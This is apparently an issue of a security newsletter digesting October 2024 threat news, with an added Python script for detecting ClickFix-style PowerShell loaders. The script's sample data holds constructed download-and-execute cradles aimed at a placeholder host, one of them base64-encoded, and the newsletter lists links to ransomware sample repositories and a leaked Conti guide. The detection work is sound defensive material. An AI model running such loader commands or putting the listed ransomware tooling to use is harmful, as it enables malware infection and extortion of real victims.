Welcome to another _secpro!
Let's cut to the chase: the Microsoft Digital Defense Report 2024 is out and we're playing catch up to get up to scratch on all the important need-to-knows, what-to-learns, and why-to-panics. (Alright, not really on that last one there.)
Make sure to pick up your copy for free and tell us what you think of it because we'll be releasing our comments, thoughts, and reflections in a special issue next week and our end-of-the-month premium issue as well. Don't miss out!
As always, make sure to check out the templates, podcasts, and other stuff on our Substack and access the very best that we have to offer. You might even learn something!
Cheers!
Austin Miller
Editor-in-Chief
AhnLab - AhnLab and NCSC Release Joint Report on Microsoft Zero-Day Browser Vulnerability: “AhnLab SEcurity intelligence Center (ASEC) and the National Cyber Security Center (NCSC) have discovered a new zero-day vulnerability in the Microsoft Internet Explorer (IE) browser and have conducted a detailed analysis on attacks that exploit this vulnerability. This post shares the joint analysis report “Operation Code on Toast by TA-RedAnt” which details the findings of the ASEC and NCSC joint analysis and the responses to the threat.”
Bruce Schneier - More Details on Israel Sabotaging Hezbollah Pagers and Walkie-Talkies: The Washington Post has a long and detailed story about the operation that’s well worth reading (alternate version here): "The sales pitch came from a marketing official trusted by Hezbollah with links to Apollo. The marketing official, a woman whose identity and nationality officials declined to reveal, was a former Middle East sales representative for the Taiwanese firm who had established her own company and acquired a license to sell a line of pagers that bore the Apollo brand. Sometime in 2023, she offered Hezbollah a deal on one of the products her firm sold: the rugged and reliable AR924."
Bruce Schneier - Perfectl Malware: “Perfectl is an impressive piece of malware”: The malware has been circulating since at least 2021. It gets installed by exploiting more than 20,000 common misconfigurations, a capability that may make millions of machines connected to the Internet potential targets, researchers from Aqua Security said. It can also exploit CVE-2023-33246, a vulnerability with a severity rating of 10 out of 10 that was patched last year in Apache RocketMQ, a messaging and streaming platform that’s found on many Linux machines.
Bruce Schneier - IronNet Has Shut Down: “After retiring in 2014 from an uncharacteristically long tenure running the NSA (and US Cyber Command), Keith Alexander founded a cybersecurity company called IronNet. At the time, he claimed that it was based on IP he developed on his own time while still in the military. That always troubled me. Whatever ideas he had, they were developed on public time using public resources: he shouldn’t have been able to leave military service with them in his back pocket. In any case, it was never clear what those ideas were… Turns out there was nothing there. After some crazy VC investments and an IPO with a $3 billion “unicorn” valuation, the company has shut its doors. It went bankrupt a year ago—ceasing operations and firing everybody—and reemerged as a private company. It now seems to be gone for good, not having found anyone willing to buy it.”
Google Cloud - How Low Can You Go? An Analysis of 2023 Time-to-Exploit Trends: “Mandiant analyzed 138 vulnerabilities that were disclosed in 2023 and that we tracked as exploited in the wild. Consistent with past analyses, the majority (97) of these vulnerabilities were exploited as zero-days (vulnerabilities exploited before patches are made available, excluding end-of-life technologies). Forty-one vulnerabilities were exploited as n-days (vulnerabilities first exploited after patches are available). While we have previously seen and continue to expect a growing use of zero-days over time, 2023 saw an even larger discrepancy grow between zero-day and n-day exploitation as zero-day exploitation outpaced n-day exploitation more heavily than we have previously observed.”
Krebs on Security - Sudanese Brothers Arrested in ‘AnonSudan’ Takedown: “The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites, and cloud providers. The younger brother is facing charges that could land him life in prison for allegedly seeking to kill people with his attacks.”
Microsoft Threat Intelligence - Microsoft Digital Defense Report 2024: “In the last year, the cyber threat landscape continued to become more dangerous and complex. The malign actors of the world are becoming better resourced and better prepared, with increasingly sophisticated tactics, techniques, and tools that challenge even the world’s best cybersecurity defenders. Even Microsoft has been the victim of well-orchestrated attacks by determined and well-resourced adversaries, and our customers face more than 600 million cybercriminal and nation-state attacks every day, ranging from ransomware to phishing to identity attacks.”
Microsoft Threat Intelligence - New macOS vulnerability, “HM Surf”, could lead to unauthorized data access: “Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf” [Editor: with apparently no intention of making a Pokemon reference…], involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device’s camera, microphone, and location, without the user’s consent.”
Sekoia - ClickFix tactic: The Phantom Meet: “In May 2024, a new social engineering tactic called ClickFix emerged, featuring a ClearFake cluster that the Sekoia Threat Detection & Research (TDR) team closely monitored and analysed in a private report entitled FLINT 2024-027 – New widespread ClearFake variant abuses PowerShell and clipboard… In recent months, multiple malware distribution campaigns have leveraged the ClickFix lure to spread Windows and macOS infostealers, botnets, and remote access tools. This is in line with the growing, ongoing trend of distributing malware through the drive-by download technique. Sekoia analysts assess that several intrusion sets recently adopted this tactic, presumably to evade antivirus software scanning and browser security features, aiming to improve attackers’ infection rates.”
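The Sekoia item above describes ClickFix lures that get a victim to paste and run a PowerShell one-liner. As an added example (not code from Sekoia's report or from this newsletter), here is a small Python triage routine that scores process command lines for the indicators such a pasted command usually carries: a download cradle, in-memory execution via iex, and a quiet launch (hidden window, profile or policy bypass), decoding any -EncodedCommand argument before scanning. The sample command lines and the example.invalid hostname are constructed for this example, and the indicator list is an editorial assumption, not a published ClickFix signature.

```python
"""Triage PowerShell command lines for ClickFix-style paste-and-run indicators.

Added example: the patterns below are an editorial assumption about what a
pasted ClickFix one-liner tends to contain (fetch a second stage, execute it in
memory, stay quiet). They are not a published signature from Sekoia or anyone else.
"""
import base64
import re
from typing import Dict, List, Optional

# Indicator families, reported by name so an analyst can see why a line scored.
# PowerShell is case-insensitive, so the patterns are too.
INDICATORS = {
    # fetches content from the network
    "download_cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"net\.webclient|start-bitstransfer|curl(\.exe)?|certutil(\.exe)?)\b", re.I),
    # executes text as code without writing it to disk
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    # hides the console window or skips profile / execution policy
    "quiet_launch": re.compile(
        r"-w(indowstyle)?\s+h(idden)?\b|-nop(rofile)?\b|"
        r"-e(xecution)?p(olicy)?\s+bypass\b|-noni(nteractive)?\b", re.I),
}

# -EncodedCommand and its short forms, followed by a base64 blob.
ENCODED_ARG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell_argument(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects: UTF-16LE, base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # binascii.Error is a ValueError subclass; a bad blob is just "not decodable"
        return None


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Score one process command line; scan the decoded payload as well if present."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    # A ClickFix paste has to fetch the next stage AND run it, so require both.
    # A quiet-launch flag alone is common in legitimate scheduled tasks and scripts.
    suspicious = "download_cradle" in hits and "in_memory_exec" in hits
    return {
        "command_line": cmdline,
        "decoded": decoded,
        "indicators": sorted(hits),
        "suspicious": suspicious,
    }


def triage(command_lines: List[str]) -> List[Dict[str, object]]:
    """Return only the command lines that look like a paste-and-run second-stage loader."""
    results = (analyze_command_line(c) for c in command_lines)
    return [r for r in results if r["suspicious"]]


# Constructed sample values for a process-creation event's command-line field
# (Sysmon Event ID 1 / Windows 4688 style). Not real telemetry.
SAMPLE_COMMAND_LINES = [
    # benign: an admin lists running services
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    # benign: a download to disk, no in-memory execution
    r'powershell.exe -Command "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\Temp\tool.zip"',
    # ClickFix-style: hidden window, web request piped straight into iex
    'powershell.exe -w hidden -c "iex (iwr -UseBasicParsing http://example.invalid/fix.txt)"',
    # ClickFix-style: the same cradle hidden behind -EncodedCommand
    "powershell.exe -nop -ep bypass -enc " + encode_powershell_argument(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')"),
    # unrelated noise
    'cmd.exe /c "echo hello"',
]

if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        print(result["indicators"], result["command_line"][:80])
```

Run against the constructed samples, only the two paste-and-run lines are flagged; the admin download to disk is reported with a single download_cradle indicator but not marked suspicious, which is the design choice worth keeping when you adapt this to real telemetry.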
Tech Informed - Ransomware threats surge with over 30 new groups this year: The number of active ransomware threat groups has risen by a third in the past year, according to cyber security firm Secureworks, with 31 new groups having entered the ransomware ecosystem. In its latest ‘State of The Threat’ report, Secureworks examined cyber risk activity from June 2023 to June 2024, with proof that ransomware risk is still high despite the takedown of large gangs such as LockBit. Despite its highly publicised takedown, LockBit remains at the top of the list of most active groups. It accounted for 17% of listings this year, down from 8% last year.
goliate/hidden-tear: It's a ransomware-like file crypter sample which can be modified for specific purposes. Simples.
ncorbuk/Python-Ransomware: A Python Ransomware Tutorial with a YouTube tutorial explaining code and showcasing the ransomware with victim/target roles.
ForbiddenProgrammer/conti-pentester-guide-leak: Leaked pentesting manuals given to Conti ransomware crooks.
codesiddhant/Jasmin-Ransomware: Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks. Jasmin helps security researchers to overcome the risk of external attacks.
ISC2 Security Congress 2024 (October 14th): "ISC2 Security Congress is just around the corner! Join thousands of cybersecurity experts from across the globe as we lead the charge against emerging threats and protect what matters most in today's digital landscape. Regular Pricing has been extended just for you! Register today and save $200."
Exploring the 2024 Horizon Report | Cybersecurity and Privacy Edition (October 15th): This webinar will explore the trends, challenges, and key technology developments identified by a panel of experts in the 2024 Horizon Report | Cybersecurity and Privacy Edition. Members of the Horizon Report team and panel will highlight contextual trends and challenges and discuss how key technologies can assist higher education cybersecurity and privacy professionals in meeting challenges and capitalizing on opportunities for the future. Implications of trends and key technologies will be considered from different institutional perspectives.
The Impact of Generative AI on Kids’ Privacy, Safety, and Security (October 15th): In our increasingly digital world, the boundaries of our expectations related to privacy, security and online safety are stretched more and more by emerging technologies, policies, and practices. The Future of Privacy Forum, AARNet, and the Australian Strategic Policy Institute (ASPI) invite you to the second in our event series on privacy, security, and online safety of young people in Australia. This session will focus on potential risks and benefits related to children’s use of the growing suite of generative AI tools and methods for combatting existing and emerging harms to young people online, including the impact of the upcoming updates to Australia’s Privacy Act and the ongoing work of various Australian digital platform regulators on generative AI and AI governance.
Red Hat Summit: Connect 2024 (October 15th, 17th, & 22nd): Red Hat® Summit: Connect is coming to cities across Asia Pacific. Join us as we explore the future of AI, hybrid cloud, open source technology, and IT. With plenty of opportunities to engage during sessions, demos, and networking, this year's in-person event will give you access to Red Hat experts and industry leaders, all at no cost.
BSidesNYC Conference (October 19th): BSidesNYC is an information security conference coordinated by security professionals within the tri-state area as part of the larger BSides framework. The conference prides itself on building an environment focused on technical content covering various security topics - from offensive security to digital forensics and incident response.
SecTor (October 23rd-26th): SecTor is renowned for bringing together international experts to discuss underground threats and corporate defenses. This cyber security conference offers a unique opportunity for IT security professionals, managers, and executives to connect and learn from experienced mentors. This year, SecTor introduces the ‘Certified Pentester’ program, including a full-day practical examination, adding to the event’s educational offerings.
LASCON 2024 (October 24th-25th): The Lonestar Application Security Conference (LASCON) is an annual event in Austin, TX, associated with OWASP, gathering 400+ web app developers, security engineers, mobile developers, and infosec professionals. Being in Texas, home to numerous Fortune 500 companies, and located in Austin, a startup hub, LASCON attracts leaders, security architects, and developers to share innovative ideas, initiatives, and technology advancements in application security.